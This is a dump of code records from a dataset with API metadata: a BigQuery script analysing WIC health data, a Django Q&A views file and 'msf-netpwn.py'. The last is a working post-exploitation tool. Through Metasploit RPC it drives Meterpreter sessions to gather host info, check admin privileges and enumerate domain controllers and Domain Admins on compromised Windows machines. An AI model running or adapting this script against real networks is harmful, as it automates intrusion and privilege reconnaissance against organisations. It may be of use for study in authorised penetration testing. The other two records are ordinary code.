"torch.nn.Linear", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 181, "usage_type": "name"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 183, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 188, "usage_type": "name"}, {"api_name": "torch.nn.ParameterList", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 192, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.nn.ParameterList", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 215, 
"usage_type": "call"}, {"api_name": "torch.randn_like", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 263, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 264, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 295, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 298, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 299, "usage_type": "call"}]}
+{"seq_id": "151601083", "text": "## This poc script for converting WIC R code to python\nyour_project_id = \"project-wic_poc\"\nimport pandas as pd\nfrom google.cloud import bigquery\nimport sys\nimport time\n\n## global variables\nprojectId = 'chmdev'\ndbName = 'DATASETCHM2021_D1'\ntableNamePrefix = ''\nmoduleName = ''\nyear = ''\ndbConn = bigquery.Client() ##global conn\n\n## decorator\ndef add_datetime(func):\n reVal = ''\n\n def wrapper():\n start = time.perf_counter()\n print(func.__name__, \" : method started\")\n func()\n print(func.__name__, \" : method stopped\")\n\n return reVal\n\n\n## create db connection\ndef get_db_conn():\n return bigquery.Client()\n\n\n## get the query to run\ndef get_query(tableNamePrefix):\n tableName = tableNamePrefix + '_' + year\n baseQuery = \"SELECT * FROM `\" + projectId + \".\" + dbName + \".\" + tableName + \"`\"\n return baseQuery\n\n\n## get specific query\n# @add_datetime\ndef specificQuery(cat):\n queryWhole = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a\n left join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip= b.ZipCode\"\"\"\n\n ### WIC data by catorgery\n ###Mom data\n queryMom = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a \n left join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode\n where a.certification_category in (1, 2, 3)\n \"\"\"\n\n ### Child data\n queryChild = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a left\n join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode \n where a.certification_category in (5)\n \"\"\"\n ### Infant data\n queryInfant = \"\"\"SELECT a.*, a.Family_zip as ZipCode, case when a.certification_category in (1,2,3) then b.MomPopulation\n else b.ChildPopulation end as PopEstimates FROM `chmdev.DATASETCHM2021_D1.MD_WIC_2019` a left\n join `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019` b on a.Family_zip = b.ZipCode \n where a.certification_category in (4)\"\"\"\n\n ## National Risk Factor data\n queryNRF = \"\"\"SELECT * FROM `chmdev.DATASETCHM2021_D1.WIC_RiskFactors`\"\"\"\n\n ## assigning appropriate query\n if(cat == 'all'):\n query = queryWhole\n elif(cat == 'mom'):\n query = queryMom\n elif(cat == 'child'):\n query = queryChild\n elif(cat == 'infant'):\n query = queryInfant\n elif(cat == 'nrf'):\n query = queryNRF\n\n return query\n\n\ndef run_SQL(dbConn, queryString):\n return dbConn.query(queryString).to_dataframe()\n\n## get indicators\ndef get_indicators():\n global dbConn\n queryInd = \"\"\"select case when VarCode='Currently.BF' then 'Currently_BF' when VarCode='Migrant.Status' then 'Migrant_Status'\n when VarCode='Ever.BF' then 'Ever_BF' else Varcode end as Ind \n from (select distinct varcode from `chmdev.DATASETCHM2021_D1.WIC_Codelookup`\n where Dataset= 'WIC' and VarType= 'Indicator' and Varcode \n not in ('FamilyIncome', 'Nutritional.Risk.check', 'Income.Period', 'NRFactor') order by Varcode asc )\"\"\"\n\n dfInd = run_SQL(dbConn,queryInd)\n return dfInd\n\n## get dimensions\ndef get_dimensions():\n global dbConn\n queryDim = \"\"\"select distinct Dim from 
(select case \n when Varcode in ('AgeRangeMoms', 'AgeRangeChild', 'AgeRangeInfant' ) then 'AgeRange' \n else Varcode end as Dim from `chmdev.DATASETCHM2021_D1.WIC_Codelookup` \n where Dataset= 'WIC' and VarType= 'Dimension' and Varcode not in ('NRFactor'))\"\"\"\n\n dfDim = run_SQL(dbConn,queryDim)\n return dfDim\n\n## get population estimates\ndef get_pop():\n global dbConn\n ##[['ZipCode','ChildPopulation','MomPopulation']]\n queryPop = \"\"\" select * from `chmdev.DATASETCHM2021_D1.MD_PopEstimates2019`\"\"\"\n dfPop = run_SQL(dbConn, queryPop)\n dfPop['PopEstimates'] = dfPop['ChildPopulation'] + dfPop['MomPopulation']\n return dfPop\n\ndef get_riskf():\n global dbConn\n queryRisk = \"\"\" SELECT distinct RF_TYPE_RISK_FACTOR_TYPE_ID as col1 \n FROM `chmdev.DATASETCHM2021_D1.WIC_RiskFactors` where HIGH_RISK_FLAG=1 \"\"\"\n\n dfRisk = run_SQL(dbConn,queryRisk)\n return dfRisk\n\ndef get_risk_factors(dfRisk):\n riskList = dfRisk.iloc[:,0].tolist()\n return riskList\n\n\ndef get_risk_counts(dfWICRisk):\n dfRiskMelt = pd.melt(dfWICRisk, id_vars=\"Family_zip\")\n\n # dfRiskMelt.columns[dfRiskMelt.columns != 'Family_zip'].to_list()\n # kind of gather ***** check later\n ##dfCrossTabRisk = pd.crosstab(index=dfRiskMelt['Family_zip'], columns=dfRiskMelt.columns[dfRiskMelt.columns != 'Family_zip'].to_list())\n\n # dfRiskMelt[1:10]\n\n # dfRiskSpreadOut = pd.crosstab(index=[dfRiskMelt['Family_zip'],dfRiskMelt['variable']], columns=dfRiskMelt['value'])\n dfRiskSpreadOut = pd.crosstab(index=dfRiskMelt['Family_zip'], columns=dfRiskMelt['value'])\n dfRiskSpreadOut = dfRiskSpreadOut.reset_index()\n dfRiskZipCountMelt = pd.melt(dfRiskSpreadOut, id_vars=[\"Family_zip\"], var_name='RiskID', value_name='Count')\n\n ## Do not delete these 2 comments\n dfRiskZipCountMelt = dfRiskZipCountMelt.sort_values(by=['Count'], ascending=False)\n # dfRiskZipCountMelt['Count_Denom'].sum()\n\n return dfRiskZipCountMelt\n\n## get totals for that zip in the data in WIC data\ndef get_zip_counts(dfWIC):\n dfWICZip = dfWIC[['Case_ID', 'Family_zip']]\n dfWICZipCounts = dfWICZip.groupby('Family_zip')['Family_zip'].count().reset_index(name='Zip_Counts')\n return dfWICZipCounts\n\n## get age unadjusted rates\ndef get_unadjusted(dfWICNRF, dfRiskCount, dfZipCounts):\n dfTemp1 = dfRiskCount.merge(dfWICNRF, left_on='RiskID',right_on='RF_TYPE_RISK_FACTOR_TYPE_ID')\n dfTemp2 = dfTemp1.merge(dfZipCounts, left_on='Family_zip',right_on='Family_zip')\n print(dfTemp2.columns)\n dfFinal = dfTemp2[['Family_zip','Count', 'CrossWalk','Zip_Counts']]\n dfFinal['Percentage'] = dfFinal['Count']/dfFinal['Zip_Counts']\n\n return dfFinal.drop_duplicates()\n\n## get age/population adjusted rates\ndef get_adjusted(dfWICNRF, dfRiskCount, dfPop):\n\n dfTemp1 = dfRiskCount.merge(dfWICNRF, left_on='RiskID', right_on='RF_TYPE_RISK_FACTOR_TYPE_ID')\n dfTemp2 = dfTemp1.merge(dfPop, left_on='Family_zip', right_on='ZipCode')\n print(dfTemp2.columns)\n dfFinal = dfTemp2[['Family_zip', 'Count', 'CrossWalk', 'PopEstimates']]\n dfFinal['Percentage'] = dfFinal['Count'] / dfFinal['PopEstimates']\n\n return dfFinal.drop_duplicates()\n\n\n## run the Stratification by Risk factors\ndef run_strat_rf():\n ## WIC whole\n query = specificQuery('all')\n dfWIC = run_SQL(dbConn, query)\n\n ##WIC NRF\n query = specificQuery('nrf')\n dfWICNRF = run_SQL(dbConn, query)\n\n ## getting the risk factors\n riskList = ['risk_1', 'risk_2', 'risk_3', 'risk_4', 'risk_5', 'risk_6', 'risk_7',\n 'risk_8', 'risk_9', 'risk_10', 'Family_zip']\n dfWICRisk = dfWIC[riskList]\n dfRiskCount = 
get_risk_counts(dfWICRisk)\n dfZipCounts = get_zip_counts(dfWIC)\n print(dfRiskCount.head())\n print(dfZipCounts.head())\n # m = ZIP counts\n # df = dfRisk counts\n # WIC_NRF\n dfUnadj = get_unadjusted(dfWICNRF, dfRiskCount, dfZipCounts)\n print(dfUnadj.head())\n dfAdj = get_adjusted(dfWICNRF, dfRiskCount, get_pop())\n print(dfAdj.head())\n\ndef run_wic_state_au():\n\n pass\n\n\ndef main():\n ## Steps\n \"\"\"\n 1. read the data from db\n 2. read the code lookups\n 3. group/slice the data for respective sections\n 4. perform analysis - current version has 3 functions\n 5. ? add metadata\n 6. ? combine the results.\n :return:\n \"\"\"\n ## 1. function to run stratification by risk factor\n run_strat_rf()\n\n ## 2. function to run functions for combinations\n\n\n\n## main function\nif __name__ == '__main__':\n print(\"Script initiated\")\n main()\n print(\"Script ended\")\n\n\n\n\n\n\n", "sub_path": "wic_draft.py", "file_name": "wic_draft.py", "file_ext": "py", "file_size_in_byte": 8125, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.bigquery.Client", "line_number": 14, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 14, "usage_type": "name"}, {"api_name": "time.perf_counter", "line_number": 21, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.Client", "line_number": 31, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.melt", "line_number": 135, "usage_type": "call"}, {"api_name": "pandas.crosstab", "line_number": 144, "usage_type": "call"}, {"api_name": "pandas.melt", "line_number": 146, "usage_type": "call"}]}
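The risk-count pipeline in get_risk_counts above is melt -> crosstab -> melt; a tiny standalone illustration with made-up zip codes and risk IDs:

import pandas as pd

df = pd.DataFrame({"Family_zip": [21201, 21201, 21202],
                   "risk_1": ["A", "B", "A"],
                   "risk_2": ["B", "A", "A"]})
melted = pd.melt(df, id_vars="Family_zip")                   # long form
counts = pd.crosstab(index=melted["Family_zip"],
                     columns=melted["value"]).reset_index()  # zip x risk-ID counts
print(pd.melt(counts, id_vars=["Family_zip"],
              var_name="RiskID", value_name="Count"))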
+{"seq_id": "56638927", "text": "from django.shortcuts import render\nfrom django.shortcuts import render, Http404, get_object_or_404, HttpResponsePermanentRedirect\nfrom django.http import HttpResponse\nfrom models import Question, Answer\nfrom forms import AskForm, AnswerForm\nfrom django.core.paginator import Paginator\n\ndef test(request, page=2):\n return HttpResponse(''+page+'')\n\ndef error (request, *args, **kwargs):\n raise Http404('Not working')\n# Create your views here.\ndef qa_new(request):\n last_questions = Question.objects.order_by('id')\n limit = request.GET.get('limit', 10)\n page = request.GET.get('page', 1)\n paginator = Paginator(last_questions, limit)\n paginator.baseurl = '/?page='\n page = paginator.page(page)\n return render(request, 'qa_new.html', {\n 'last_questions': page.object_list,\n 'paginator': paginator,\n 'page': page,\n })\n\ndef qa_popular(request):\n questions = Question.objects.order_by('-rating')\n limit = request.GET.get('limit', 10)\n page = request.GET.get('page')\n paginator = Paginator(questions, limit)\n paginator.baseurl = '/popular/?page='\n page = paginator.page(page)\n return render(request, 'qa_popular.html', {\n 'questions': page.object_list,\n 'paginator': paginator,\n 'page': page,\n })\n\ndef qa_question(request, question_id):\n question = get_object_or_404(Question, id=question_id)\n answers = Answer.objects.filter(question=question_id)\n if request.method is 'POST':\n return answer_form(request)\n form = AnswerForm()\n context = {\n 'title': question.title,\n 'text': question.text,\n 'answers': answers,\n 'rating': question.rating,\n 'from': form,\n }\n return render(request, 'qa_question.html', context)\n", "sub_path": "ask/qa/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1776, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.http.HttpResponse", "line_number": 9, "usage_type": "call"}, {"api_name": "django.shortcuts.Http404", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Question.objects.order_by", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 15, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Question.objects.order_by", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Question.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.Question", "line_number": 28, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Question", "line_number": 41, "usage_type": "argument"}, {"api_name": "models.Answer.objects.filter", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Answer.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.Answer", "line_number": 42, "usage_type": "name"}, {"api_name": "forms.AnswerForm", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "321796321", "text": "#!/usr/bin/env python3\n\nimport re\nimport os\nimport sys\nimport time\nimport signal\nimport msfrpc\nimport asyncio\nimport argparse\nimport netifaces\nfrom IPython import embed\nfrom termcolor import colored\nfrom netaddr import IPNetwork, AddrFormatError\nfrom subprocess import Popen, PIPE, CalledProcessError\n\nBUSY_SESSIONS = []\n\ndef parse_args():\n # Create the arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-l\", \"--hostlist\", help=\"Host list file\")\n parser.add_argument(\"-p\", \"--password\", default='123', help=\"Password for msfrpc\")\n parser.add_argument(\"-u\", \"--username\", default='msf', help=\"Username for msfrpc\")\n return parser.parse_args()\n\n# Colored terminal output\ndef print_bad(msg):\n print((colored('[-] ', 'red') + msg))\n\ndef print_info(msg):\n print((colored('[*] ', 'blue') + msg))\n\ndef print_good(msg):\n print((colored('[+] ', 'green') + msg))\n\ndef print_great(msg):\n print((colored('[!] {}'.format(msg), 'yellow', attrs=['bold'])))\n\ndef kill_tasks():\n print()\n print_info('Killing tasks then exiting...')\n for task in asyncio.Task.all_tasks():\n task.cancel()\n\ndef get_iface():\n '''\n Gets the right interface for Responder\n '''\n try:\n iface = netifaces.gateways()['default'][netifaces.AF_INET][1]\n except:\n ifaces = []\n for iface in netifaces.interfaces():\n # list of ipv4 addrinfo dicts\n ipv4s = netifaces.ifaddresses(iface).get(netifaces.AF_INET, [])\n\n for entry in ipv4s:\n addr = entry.get('addr')\n if not addr:\n continue\n if not (iface.startswith('lo') or addr.startswith('127.')):\n ifaces.append(iface)\n\n iface = ifaces[0]\n\n return iface\n\ndef get_local_ip(iface):\n '''\n Gets the the local IP of an interface\n '''\n ip = netifaces.ifaddresses(iface)[netifaces.AF_INET][0]['addr']\n return ip\n\nasync def get_shell_info(CLIENT, sess_num):\n sysinfo_cmd = 'sysinfo'\n sysinfo_end_str = b'Meterpreter : '\n\n sysinfo_output = await run_session_cmd(CLIENT, sess_num, sysinfo_cmd, sysinfo_end_str)\n # Catch error\n if type(sysinfo_output) == str:\n return sysinfo_output\n\n else:\n sysinfo_utf8_out = sysinfo_output.decode('utf8')\n sysinfo_split = sysinfo_utf8_out.splitlines()\n\n getuid_cmd = 'getuid'\n getuid_end_str = b'Server username:'\n\n getuid_output = await run_session_cmd(CLIENT, sess_num, getuid_cmd, getuid_end_str)\n # Catch error\n if type(getuid_output) == str:\n return getuid_output\n else:\n getuid_utf8_out = getuid_output.decode('utf8')\n getuid = 'User : '+getuid_utf8_out.split('Server username: ')[-1].strip().strip()\n\n # We won't get here unless there's no errors\n shell_info_list = [getuid] + sysinfo_split\n\n return shell_info_list\n\ndef get_domain(shell_info):\n for l in shell_info:\n l_split = l.split(':')\n if 'Domain ' in l_split[0]:\n if 'WORKGROUP' in l_split[1]:\n return False\n else:\n domain = l_split[-1].strip()\n return domain\n\ndef is_domain_joined(user_info, domain):\n info_split = user_info.split(':')\n dom_and_user = info_split[1].strip()\n dom_and_user_split = dom_and_user.split('\\\\')\n dom = dom_and_user_split[0]\n user = dom_and_user_split[1]\n if domain:\n if dom.lower() in domain.lower():\n return True\n\n return False\n\ndef print_shell_data(shell_info, admin_shell, local_admin, sess_num_str):\n print_info('New shell info')\n for l in shell_info:\n print(' '+l)\n msg = ''' Admin shell : {}\n Local admin : {}\n Session number : {}'''.format( \n admin_shell.decode('utf8'), \n local_admin.decode('utf8'),\n sess_num_str)\n 
print(msg)\n\nasync def sess_first_check(CLIENT, session, sess_num):\n if b'first_check' not in session:\n print_good('Session {} found, gathering shell info...'.format(str(sess_num)))\n\n # Give meterpreter a chance to open\n await asyncio.sleep(2)\n\n sess_num_str = str(sess_num)\n session[b'first_check'] = b'False'\n session[b'session_number'] = sess_num_str.encode()\n\n shell_info = await get_shell_info(CLIENT, sess_num)\n # Catch errors\n if type(shell_info) == str:\n session[b'error'] = shell_info.encode()\n return session\n\n # returns either a string of the domain name or False\n domain = get_domain(shell_info)\n if domain:\n session[b'domain'] = domain.encode()\n\n domain_joined = is_domain_joined(shell_info[0], domain)\n if domain_joined == True:\n session[b'domain_joined'] = b'True'\n else:\n session[b'domain_joined'] = b'False'\n\n admin_shell, local_admin = await is_admin(CLIENT, sess_num)\n # Catch errors\n if type(admin_shell) == str:\n session[b'error'] = admin_shell.encode()\n return session\n\n session[b'admin_shell'] = admin_shell\n session[b'local_admin'] = local_admin\n\n print_shell_data(shell_info, admin_shell, local_admin, sess_num_str)\n\n return session\n\nasync def is_admin(CLIENT, sess_num):\n cmd = 'run post/windows/gather/win_privs'\n\n output = await run_session_cmd(CLIENT, sess_num, cmd, None)\n # Catch error\n if type(output) == str:\n return (output, None)\n\n if output:\n split_out = output.decode('utf8').splitlines()\n user_info_list = split_out[5].split()\n admin_shell = user_info_list[0]\n system = user_info_list[1]\n local_admin = user_info_list[2]\n user = user_info_list[5]\n\n # Byte string\n return (str(admin_shell).encode(), str(local_admin).encode())\n\n else:\n return (b'ERROR', b'ERROR')\n\nasync def get_domain_controller(CLIENT, domain_data, sess_num):\n print_info('Getting domain controller...')\n cmd = 'run post/windows/gather/enum_domains'\n end_str = b'[+] Domain Controller:'\n output = await run_session_cmd(CLIENT, sess_num, cmd, end_str)\n\n # Catch timeout\n if type(output) == str:\n domain_data['err'].append(sess_num)\n return domain_data\n\n output = output.decode('utf8')\n if 'Domain Controller: ' in output:\n dc = output.split('Domain Controller: ')[-1].strip()\n domain_data['domain_controllers'].append(dc)\n print_good('Domain controller: '+dc)\n else:\n print_bad('No domain controller found')\n\n return domain_data\n\nasync def get_domain_admins(CLIENT, domain_data, sess_num):\n print_info('Getting domain admins...')\n cmd = 'run post/windows/gather/enum_domain_group_users GROUP=\"Domain Admins\"'\n end_str = b'[+] User list'\n\n output = await run_session_cmd(CLIENT, sess_num, cmd, end_str)\n # Catch timeout\n if type(output) == str:\n domain_data['err'].append(sess_num)\n return domain_data\n\n output = output.decode('utf8')\n da_line_start = '[*] \\t'\n\n if da_line_start in output:\n split_output = output.splitlines()\n print_info('Domain admins:')\n\n domain_admins = []\n for l in split_output:\n if l.startswith(da_line_start):\n domain_admin = l.split(da_line_start)[-1].strip()\n domain_admins.append(domain_admin)\n print(' '+domain_admin)\n domain_data['domain_admins'] = domain_admins\n\n else:\n print_bad('No domain admins found')\n 
sess_num)\n domain_data = await get_domain_admins(CLIENT, domain_data, sess_num)\n\n return domain_data\n\nasync def attack_with_sessions(CLIENT, sessions, domain_data):\n\n if len(sessions) > 0:\n\n for s in sessions:\n\n # Get and print session info if first time we've checked the session\n sessions[s] = await sess_first_check(CLIENT, sessions[s], s)\n \n # Update domain data\n if b'domain' in sessions[s]:\n domain_data['domains'].append(sessions[s][b'domain'])\n\n if domain_data['domain_admins'] == []:\n domain_data = await get_domain_data(CLIENT, sessions[s], s, domain_data)\n\n return (sessions, domain_data)\n\ndef get_output(CLIENT, cmd, sess_num):\n output = CLIENT.call('session.meterpreter_read', [str(sess_num)])\n\n # Everythings fine\n if b'data' in output:\n return output[b'data']\n\n # Got an error from the CLIENT.call\n elif b'error_message' in output:\n decoded_err = output[b'error_message'].decode('utf8')\n print_bad(error_msg.format(sess_num_str, decoded_err))\n return decoded_err\n\n # Some other error catchall\n else:\n return cmd\n\ndef get_output_errors(output, counter, cmd, sess_num, timeout, sleep_secs):\n script_errors = [b'[-] post failed', \n b'error in script', \n b'operation failed', \n b'unknown command', \n b'operation timed out']\n\n # Got an error from output\n if any(x in output.lower() for x in script_errors):\n print_bad(('Command [{}] in session {} '\n 'failed with error: {}'\n ).format(cmd, str(sess_num), output.decode('utf8')))\n return cmd, counter\n\n # If no terminating string specified just wait til timeout\n if output == b'':\n counter += sleep_secs\n if counter > timeout:\n print_bad('Command [{}] in session {} timed out'.format(cmd, str(sess_num)))\n return 'timed out', counter\n\n # No output but we haven't reached timeout yet\n return output, counter\n\nasync def run_session_cmd(CLIENT, sess_num, cmd, end_str, timeout=30):\n ''' Will only return a str if we failed to run a cmd'''\n global BUSY_SESSIONS\n\n error_msg = 'Error in session {}: {}'\n sess_num_str = str(sess_num)\n\n print_info('Running [{}] on session {}'.format(cmd, str(sess_num)))\n\n while sess_num in BUSY_SESSIONS:\n await asyncio.sleep(.1)\n\n BUSY_SESSIONS.append(sess_num)\n\n res = CLIENT.call('session.meterpreter_run_single', [str(sess_num), cmd])\n\n if b'error_message' in res:\n err_msg = res[b'error_message'].decode('utf8')\n print_bad(error_msg.format(sess_num_str, err_msg))\n return err_msg\n\n elif res[b'result'] == b'success':\n\n counter = 0\n sleep_secs = 0.5\n\n try:\n while True:\n await asyncio.sleep(sleep_secs)\n\n output = get_output(CLIENT, cmd, sess_num)\n # Error from meterpreter console\n if type(output) == str:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # Successfully completed\n if end_str:\n if end_str in output:\n BUSY_SESSIONS.remove(sess_num)\n return output\n # If no end_str specified just return once we have any data\n else:\n if len(output) > 0:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # Check for errors from cmd's output\n output, counter = get_output_errors(output, counter, cmd, sess_num, timeout, sleep_secs)\n # Error from cmd output including timeout\n if type(output) == str:\n BUSY_SESSIONS.remove(sess_num)\n return output\n\n # This usually occurs when the session suddenly dies or user quits it\n except Exception as e:\n err = 'exception below likely due to abrupt death of session'\n print_bad(error_msg.format(sess_num_str, err))\n print_bad(' '+str(e))\n BUSY_SESSIONS.remove(sess_num)\n return err\n\n # b'result' not in 
res, b'error_message' not in res, just catch everything else as an error\n    else:\n        print_bad(res[b'result'].decode('utf8'))\n        BUSY_SESSIONS.remove(sess_num)\n        return cmd\n\ndef get_perm_token(CLIENT):\n    # Authenticate and grab a permanent token\n    CLIENT.login(args.username, args.password)\n    CLIENT.call('auth.token_add', ['123'])\n    CLIENT.token = '123'\n    return CLIENT\n\ndef filter_broken_sessions(updated_sessions):\n    ''' We remove 2 kinds of errored sessions: 1) timed out on sysinfo 2) shell died abruptly '''\n    unbroken_sessions = {}\n\n    for s in updated_sessions:\n        if b'error' in updated_sessions[s]:\n            # Session timed out on initial sysinfo cmd\n            if b'domain' not in updated_sessions[s]:\n                continue\n            # Session abruptly died\n            elif updated_sessions[s][b'error'] == b'exception below likely due to abrupt death of session':\n                continue\n\n        unbroken_sessions[s] = updated_sessions[s]\n\n    return unbroken_sessions\n\ndef update_sessions(sessions, updated_sessions):\n    ''' Four keys added after we process a new session:\n        first_check, domain_joined, local_admin, admin_shell\n    This function does not overwrite data from MSF;\n    it only adds previously known data to the MSF session'''\n    if updated_sessions:\n        updated_sessions = filter_broken_sessions(updated_sessions)\n\n        # s = session number, sessions[s] = session data dict\n        for s in sessions:\n            if s in updated_sessions:\n                for k in updated_sessions[s]:\n                    if k not in sessions[s]:\n                        sessions[s][k] = updated_sessions[s].get(k)\n\n    return sessions\n\nasync def check_for_sessions(CLIENT):\n    domain_data = {'domains':[],\n                   'domain_controllers':[],\n                   'domain_admins':[],\n                   'err':[]}\n    updated_sessions = None\n    print_info('Waiting for Meterpreter shell')\n\n    while True:\n\n        # Get list of MSF sessions from RPC server\n        sessions = CLIENT.call('session.list')\n\n        # Update the session info dict with previously found information\n        sessions = update_sessions(sessions, updated_sessions)\n\n        # Do stuff with the sessions\n        updated_sessions, domain_data = await attack_with_sessions(CLIENT, sessions, domain_data)\n\n        await asyncio.sleep(10)\n\ndef main(args):\n\n    CLIENT = msfrpc.Msfrpc({})\n    CLIENT = get_perm_token(CLIENT)\n\n    loop = asyncio.get_event_loop()\n    loop.add_signal_handler(signal.SIGINT, kill_tasks)\n    task = asyncio.ensure_future(check_for_sessions(CLIENT))\n    try:\n        loop.run_until_complete(task)\n    except asyncio.CancelledError:\n        print_info('Tasks gracefully downed a cyanide pill before defecating themselves and collapsing in a twitchy pile')\n    finally:\n        loop.close()\n\nif __name__ == \"__main__\":\n    args = parse_args()\n    if os.geteuid():\n        print_bad('Run as root')\n        sys.exit()\n    main(args)\n\n", "sub_path": "msf-netpwn.py", "file_name": "msf-netpwn.py", "file_ext": "py", "file_size_in_byte": 15336, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 21, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 29, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 32, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 35, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 38, "usage_type": "call"}, {"api_name": "asyncio.Task.all_tasks", "line_number": 43, "usage_type": "call"}, {"api_name": "asyncio.Task", "line_number": 43, "usage_type": "attribute"}, {"api_name": "netifaces.gateways", "line_number": 51, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", 
"line_number": 51, "usage_type": "attribute"}, {"api_name": "netifaces.interfaces", "line_number": 54, "usage_type": "call"}, {"api_name": "netifaces.ifaddresses", "line_number": 56, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 56, "usage_type": "attribute"}, {"api_name": "netifaces.ifaddresses", "line_number": 73, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 73, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 144, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 251, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 333, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 351, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 451, "usage_type": "call"}, {"api_name": "msfrpc.Msfrpc", "line_number": 455, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 458, "usage_type": "call"}, {"api_name": "signal.SIGINT", "line_number": 459, "usage_type": "attribute"}, {"api_name": "asyncio.ensure_future", "line_number": 460, "usage_type": "call"}, {"api_name": "asyncio.CancelledError", "line_number": 463, "usage_type": "attribute"}, {"api_name": "os.geteuid", "line_number": 470, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 472, "usage_type": "call"}]}
